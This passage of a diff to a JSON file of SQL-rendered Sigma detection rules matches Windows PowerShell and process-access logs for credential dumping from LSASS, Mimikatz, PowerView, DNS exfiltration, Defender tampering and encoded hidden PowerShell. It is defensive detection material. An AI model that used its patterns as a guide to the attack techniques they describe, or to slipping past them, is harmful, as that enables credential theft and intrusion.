AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", @@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", @@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE 